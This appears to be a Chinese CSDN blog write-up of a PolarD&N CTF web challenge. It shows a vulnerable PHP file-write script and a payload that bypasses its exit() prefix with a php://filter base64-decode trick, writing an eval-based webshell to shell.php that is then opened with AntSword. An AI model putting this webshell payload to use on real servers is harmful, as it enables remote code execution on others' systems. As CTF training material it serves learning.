polar CTF 写shell

最新推荐文章于 2024-06-17 17:11:39 发布

samRsa

最新推荐文章于 2024-06-17 17:11:39 发布

阅读量575

点赞数 8

分类专栏： CTF 文章标签： web安全

本文链接：https://blog.csdn.net/qq_36286161/article/details/135588021

版权

CTF 专栏收录该内容

15 篇文章 0 订阅

订阅专栏

一、题目

<?php
/*

PolarD&N CTF

*/

highlight_file(__FILE__);

file_put_contents($_GET['filename'],"<?php exit();".$_POST['content']);

?>

二、解题
payload

?filename=php://filter/convert.base64-decode/resource=shell.php
#<?=@eval($_POST[1]);?>
content=aPD89QGV2YWwoJF9QT1NUWzFdKTs/Pg==

然后访问/shell.php发现木马被读入，用蚁剑连接

在这里插入图片描述

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

samRsa

关注关注

8
点赞
踩
7

收藏

觉得还不错? 一键收藏
打赏
0
评论
polar CTF 写shell

polar CTF 写shell 然后访问/shell.php发现木马被读入，用蚁剑连接。
复制链接

扫一扫

专栏目录

08-26

05-23

参与评论您还未登录，请先登录后发表或查看评论

PolarD&N-CTF-web方向-中等

J1ng_Hong的博客

12-12

1495

（由于发现中等题里面有许多新的知识点，所以特意拉了一个新的博客来展示）

Polar靶场写shell

m0_64016126的博客

12-12

450

一句话的base64，至于前面为什么要加个a，主要是为了让前面的<?php exit();代码很简单，就是向让我们写shell到一个文件里，但是文件的内容被拼接上了"<?"，这就导致如果我们按常规思路写shell进去的话，执行时就会直接先执行exit()退出了，我们后面的shell代码是无法执行的。payload的整个意思就是在shell.php里写入一句话的base64加密内容，文件名利用php://filter/进行解密，这样的话，记录一个PHP中绕过exit()写shell的方法。

polarctf靶场[reverse]shell、PE结构、拼接

m0_73981089的博客

05-29

360

　 [reverse]shell 　　考点：脱壳　 [reverse]PE结构　　考点：PE结构　 [reverse]拼接　　考点：C语言

PolarD&N CTF—Choice

m0_64447841的博客

10-12

205

接下来解题思路就很简单了:计算溢出偏移量，运行程序输入3进入。Shift+F12查看字符串发现有后门函数shell。函数，根据偏移量输入占位字符，并覆盖返回地址为。函数中，可以看出程序给出三个选项分别对应。函数虽然存在溢出，但溢出距离不足以构造。函数地址，然后getshell。攻击链，不能getshell。这是一道比较常规的PWN题。，这里存在明显栈溢出。

polar CTF CB链

samRsa

01-14

720

polar CTF CB链使用ysoserial项目中的CommonsBeanutils1链写一个POC，注意确保ysoserial项目中的pom.xml中的commons-beanutils与题目一致；ysoserial项目地址：https://github.com/frohoff/ysoserial。看到存在commons-beanutils依赖且版本为1.9.2，可利用CB链Getshell。1、通过jar包，可以看到/user路由下有反序列化操作。

polar CTF 简单rce

samRsa

01-03

599

polar CTF 简单rce 【代码】polar CTF 简单rce。

Polar Web【中等】写shell

AlanKSorata的博客

06-07

716

注意首页PHP代码中半封闭的那部分代码，需要在base64编码结果前插入hex范围内的任一字符，或者直接采用人为封闭并另起PHP代码块的方式，而本文采用的是前者。本文也随即演示了base64编码在Python中的实现方式。

polar CTF web 被黑掉的站

samRsa

01-02

571

polar CTF web 被黑掉的站看到shell.php和index.php.bak。一看就是爆破，字典都给了，最后得到为。1、dirsearch 扫目录。

Polar 写shell

Jay17的博客

03-06

481

Polar 写shell

polar码译码matlab程序

10-19

码长2014的polar码matlab译码程序，采用SCL算法

MAtlab.rar_polar

09-24

image polar to convert an image from Matrice to polar conrdinate, its about 5 functions that works toguether

pola.rar_polar

09-19

polar例子程序，自己的一个项目中的例子，欢迎大家提出问题。

2024中国网络安全产品用户调查报告（发布版）

2301_76786857的博客

06-12

851

本报告正是安在新媒体发起，基于“诸子云社群，以“取之于民，用之于民"的方式，反馈“甲方"眼中的中国网络安全市场情况，为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始，人类进入了21世纪的第二个十年，全球进入了百年未有之大变局，新十年的开始即被新冠疫情逆转了全球化发展的历程，而至2022年3月俄乌战争又突然爆发，紧接着2023年7月“巴以冲突"皱起，世界快速进入动荡中，不确定性激增，网络对抗愈演愈烈，导致中国网络安全市场和环境受到重大影响。

网络安全管理组织架构复习

LongL_GuYu的博客

06-12

497

网络安全管理组织架构复习

网络安全练气篇——OWASP TOP 10

weixin_55762309的博客

06-13

1059

OWASP（开放式Web应用程序安全项目）是一个开放的社区，由非营利组织 OWASP基金会支持的项目。对所有致力于改进应用程序安全的人士开放，旨在提高对应用程序安全性的认识。其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ，总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞，是开发、测试、服务、咨询人员应知应会的知识。最重要的版本应用程序中最严重的十大风险。

网络安全筑基篇——SQL注入

最新发布

weixin_55762309的博客

06-17

968

SQL（Structured Query Language，结构化查询语言）是一种用于管理关系型数据库系统的语言，它可以用于创建、修改和删除数据库中的表和记录，以及执行查询操作。简单易学：SQL语法相对简单，易于理解和学习。高效灵活：SQL可以执行快速和复杂的数据库操作，如插入、更新、删除和查询。标准化：SQL是一种标准化的语言，大多数关系型数据库系统都支持SQL。表达能力强：SQL支持各种复杂的查询和数据操作，可以根据需要进行数据的筛选、排序、合并等操作。

polardb设置不区分大小写

05-19

Polardb是阿里云推出的一种云原生关系型数据库服务，支持MySQL、PostgreSQL和Oracle三种数据库引擎，但是它并不是一个独立的数据库软件，而是基于开源的数据库软件进行二次开发和优化。在Polardb中，可以通过设置字符集和校对规则来确定是否区分大小写。如果需要在Polardb中设置不区分大小写，可以使用如下的步骤： 1. 登录Polardb数据库的控制台，进入实例详情页。 2. 在实例详情页中，找到“数据库连接”栏目，记录下当前的数据库端口号和连接地址（如：rm-xxxxxxx.polardb.cn-zhangjiakou.rds.aliyuncs.com:3433）。 3. 在本地安装MySQL客户端软件（如：MySQL Workbench），使用上述记录的连接地址和端口号，以及正确的用户名和密码，连接到Polardb数据库。 4. 在MySQL客户端中，执行如下命令，设置不区分大小写： ``` mysql> SET collation_connection = 'utf8_general_ci'; ``` 这个命令会将当前连接的字符集和校对规则设置为“utf8_general_ci”，其中“ci”表示不区分大小写。 5. 验证设置是否生效，可以通过执行如下命令，查看字符集和校对规则是否已经被修改： ``` mysql> SHOW VARIABLES LIKE 'collation%'; ``` 如果返回的结果中，包含“utf8_general_ci”这个字符串，那么表示设置已经生效。需要注意的是，修改字符集和校对规则可能会影响到现有的数据库表和数据，因此在进行设置之前，需要做好相应的备份和风险评估。

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交